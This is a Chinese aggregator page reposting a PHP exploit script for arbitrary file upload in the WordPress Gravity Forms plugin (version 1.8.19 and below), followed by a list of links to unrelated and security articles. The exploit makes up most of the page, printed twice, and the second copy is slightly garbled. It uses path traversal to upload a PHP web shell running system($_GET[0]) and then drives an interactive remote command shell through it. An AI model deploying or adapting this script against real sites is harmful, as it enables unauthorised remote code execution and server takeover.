WordPressGravityForms1.8.19ShellUpload

作者：点燃半吱煙 | 来源：互联网 | 2023-09-05 07:59

发布：2016.06.18级别：高CWE：CWE-264PHP

发布：2016.06.18

级别：高

CWE：CWE-264

<br><?php<br># Exploit Title: Wordpress Gravity Forms - Arbitrary File Upload<br># Vendor Homepage: http://www.gravityforms.com/<br># Vulnerable Version(s): 1.8.19 (and below)<br># Exploit Author: Abk Khan<br># Contact: [ an0nguy @ protonmail.ch ]<br># Website: http://blog.lolwaleet.com/<br># Category: webapps<br># PS: I just wrote the exploit code by reading this write-up [ goo.gl/816np5 ] -- Don't know who found the vulnerability!<br>error_reporting(0);<br>$domain = 'http://localhost/wordpress';<br>$url = "$domain/?gf_page=upload";<br>$shell = "$domain/wp-content/_input_3_khan.php5";<br>$separator = '-----------------------------------------------------';<br>$ch = curl_init($url);<br>curl_setopt($ch, CURLOPT_POST, 1);<br>curl_setopt($ch, CURLOPT_POSTFIELDS, '<?=system($_GET[0]);?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3');<br>curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br>$respOnse= curl_exec($ch);<br>curl_close($ch);<br>if (eregi('ok', $response)) {<br>echo "$separator\nShell at $shell\n$separator\n\n";<br>while ($testCom != 'bubye!') {<br>$user = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~'));<br>echo "$user@b0x:~$ ";<br>$handle = fopen("php://stdin", 'r');<br>$testCom = trim(fgets($handle));<br>fclose($handle);<br>$comOut = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n";<br>echo $comOut;<br>}<br>}<br>else {<br>die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator");<br>}<br>function get_string_between($string, $start, $end)<br>{<br># stolen from stackoverflow!<br>$string = " " . $string;<br>$ini = strpos($string, $start);<br>if ($ini == 0)<br>return "";<br>$ini += strlen($start);<br>$len = strpos($string, $end, $ini) - $ini;<br>return substr($string, $ini, $len);<br>}<br>?>

# Exploit Title: Wordpress Gravity Forms - Arbitrary File Upload

# Vendor Homepage: http://www.gravityforms.com/

# Vulnerable Version(s): 1.8.19 (and below)

# Exploit Author: Abk Khan

# Contact: [ an0nguy @ protonmail.ch ]

# Website: http://blog.lolwaleet.com/

# Category: webapps

# PS: I just wrote the exploit code by reading this write-up [ goo.gl/816np5 ] -- Don't know who found the vulnerability!

error_reporting(0);

$domain = 'http://localhost/wordpress';

$url = "$domain/?gf_page=upload";

$shell = "$domain/wp-content/_input_3_khan.php5";

$separator = '-----------------------------------------------------';

$ch = curl_init($url);

curl_setopt($ch, CURLOPT_POST, 1);

curl_setopt($ch, CURLOPT_POSTFIELDS, 'system($_GET[0]);?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3');

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$respOnse= curl_exec($ch);

curl_close($ch);

if (eregi('ok', $response)) {

echo "$separator\nShell at $shell\n$separator\n\n";

while ($testCom != 'bubye!') {

$user = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~'));

echo "$user@b0x:~$ ";

$handle = fopen("php://stdin", 'r');

$testCom = trim(fgets($handle));

fclose($handle);

$comOut = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n";

echo $comOut;

}

else {

die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator");

}

function get_string_between($string, $start, $end)

{

# stolen from stackoverflow!

$string = " " . $string;

$ini = strpos($string, $start);

if ($ini == 0)

return "";

$ini += strlen($start);

$len = strpos($string, $end, $ini) - $ini;

return substr($string, $ini, $len);

}

推荐阅读

php
CTF竞赛中文件上传技巧与安全绕过方法深入解析

CTF竞赛中文件上传技巧与安全绕过方法深入解析 ... [详细]

蜡笔小新 2024-11-07 15:41:52
php
某CMS 20180827版前端存在GETShell漏洞分析

2018年9月21日，Destoon官方发布了安全更新，修复了一个由用户“索马里的海贼”报告的前端GETShell漏洞。该漏洞存在于20180827版本的某CMS中，攻击者可以通过构造特定的HTTP请求，利用该漏洞在服务器上执行任意代码，从而获得对系统的控制权。此次更新建议所有用户尽快升级至最新版本，以确保系统的安全性。 ... [详细]

蜡笔小新 2024-11-06 11:57:32
php
利用Axis2默认凭据漏洞入侵Web服务的安全风险分析与防范措施分享

近期，针对Axis2默认凭据漏洞的攻击案例在安全社区引起了广泛关注。这些攻击通常利用Axis2的默认用户名和密码进行渗透测试，技术手段相对固定。本文在综合分析多个案例的基础上，详细探讨了该漏洞的安全风险，并提出了有效的防范措施，以帮助企业和开发者加强Web服务的安全防护。 ... [详细]

蜡笔小新 2024-11-07 11:38:58
substring
Android 图片上传工具类优化方案（第三部分）

本文介绍了在 Android 平台上的图片上传工具类优化方案，重点讨论了如何通过设置 `MultipartEntity` 来实现图片的高效上传。具体实现中，通过自定义 `UserUploadServiceImpl` 类，详细展示了如何构建和发送包含图片数据的 HTTP 请求。此外，还探讨了如何处理上传过程中的常见问题，如网络异常和文件格式验证，以确保上传的稳定性和可靠性。 ... [详细]

蜡笔小新 2024-10-27 17:44:50
php
WordPress Duplicator 0.4.4 版本存在跨站脚本攻击漏洞分析

在对WordPress Duplicator插件0.4.4版本的安全评估中，发现其存在跨站脚本（XSS）攻击漏洞。此漏洞可能被利用进行恶意操作，建议用户及时更新至最新版本以确保系统安全。测试方法仅限于安全研究和教学目的，使用时需自行承担风险。漏洞编号：HTB23162。 ... [详细]

蜡笔小新 2024-11-10 13:16:43
import
掌握Android UI设计：利用ZoomControls实现图片缩放功能

本文介绍了如何在Android应用中通过使用ZoomControls组件来实现图片的缩放功能。ZoomControls提供了一种简单且直观的方式，让用户可以通过点击放大和缩小按钮来调整图片的显示大小。文章详细讲解了ZoomControls的基本用法、布局设置以及与ImageView的结合使用方法，适合初学者快速掌握Android UI设计中的这一重要功能。 ... [详细]

蜡笔小新 2024-11-04 14:29:34
php
如何在AppFog免费云平台上部署WordPress：详细图文指南

AppFog 是一个基于 CloudFoundry 的多语言 PaaS（平台即服务）提供商，允许用户在其平台上轻松构建和部署 Web 应用程序。本文将通过详细的图文步骤，指导读者如何在 AppFog 免费云平台上成功部署 WordPress，帮助用户快速搭建个人博客或网站。 ... [详细]

蜡笔小新 2024-11-02 12:50:27
php
二维条码扫描器通过串口在网页中实现数据展示

在使用USB接口的二维条码扫描器时，发现其无法正确识别条码中的中文字符。然而，采用串口连接的方式则能够成功识别。目前面临的问题是如何将通过串口获取的数据在网页中进行实时展示，希望各位专家能提供解决方案，不胜感激。 ... [详细]

蜡笔小新 2024-11-10 10:23:13
php
Axublog 1.1.0 版本 c_login.php 文件中发现 SQL 注入安全漏洞

在 Axublog 1.1.0 版本的 `c_login.php` 文件中发现了一个严重的 SQL 注入漏洞。该漏洞允许攻击者通过操纵登录请求中的参数，注入恶意 SQL 代码，从而可能获取敏感信息或对数据库进行未授权操作。建议用户尽快更新到最新版本并采取相应的安全措施以防止潜在的风险。 ... [详细]

蜡笔小新 2024-11-09 13:37:09
php
成都服务器租赁适用于哪些网站业务部署——Vecloud专业解析

成都，作为四川省的省会，不仅是西南地区唯一的副省级城市，也是国家重要的高新技术产业基地和商贸物流中心。Vecloud专业解析指出，成都服务器租赁服务特别适合各类网站业务的部署，尤其是需要高效、稳定和安全的在线应用。无论是电子商务平台、内容管理系统还是大数据分析，成都的服务器租赁都能提供强大的支持，满足不同企业的需求。 ... [详细]

蜡笔小新 2024-11-08 21:00:57
post
深入解析：Django框架中的MVT设计模式终于被讲得明明白白！

本文深入解析了Django框架中的MVT（Model-View-Template）设计模式，详细阐述了其工作原理和应用流程。通过分析URL模式、视图、模型和模板等关键组件，读者将全面理解Django应用程序的架构体系，掌握如何高效地构建和管理Web应用。 ... [详细]

蜡笔小新 2024-11-08 14:32:20
bash
如何将PHP文件上传至服务器及正确配置服务器地址

如何将PHP文件上传至服务器及正确配置服务器地址 ... [详细]

蜡笔小新 2024-10-31 15:32:47
php
解决SWFUpload在本地测试成功但服务器上出现404或500错误的方法

在使用SWFUpload进行图片批量上传时，尽管本地测试一切正常，但在部署到服务器后却遇到了404和500错误。经过详细排查，发现404错误的原因在于`flash_url`和`upload_url`需要配置为绝对路径。此外，500错误可能是由于服务器端的权限设置或脚本错误导致，建议检查服务器日志以获取更多调试信息。通过这些调整，最终成功解决了问题。 ... [详细]

蜡笔小新 2024-10-30 17:27:12
blob
HTML5大文件传输技术深度解析与实践分享

本文深入探讨了HTML5在Web前端开发中实现大文件上传的技术细节与实践方法。通过实例分析，详细讲解了如何利用HTML5的相关特性高效、稳定地处理大文件传输问题，并提供了可供参考的代码示例和解决方案。此外，文章还讨论了常见的技术挑战及优化策略，旨在帮助开发者更好地理解和应用HTML5大文件上传技术。 ... [详细]

蜡笔小新 2024-10-28 18:59:50
php
微信小程序利用JavaScript实现图片上传至PHP服务器的详细方法与技巧

本文详细介绍了如何在微信小程序中使用JavaScript实现图片上传至PHP服务器的方法。通过具体的代码示例，帮助开发者掌握从客户端选择图片、处理图片数据到服务器端接收并保存图片的完整流程。同时，文章还提供了常见问题的解决方案和优化建议，确保上传过程的高效性和稳定性。 ... [详细]

蜡笔小新 2024-10-27 20:16:58

点燃半吱煙

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章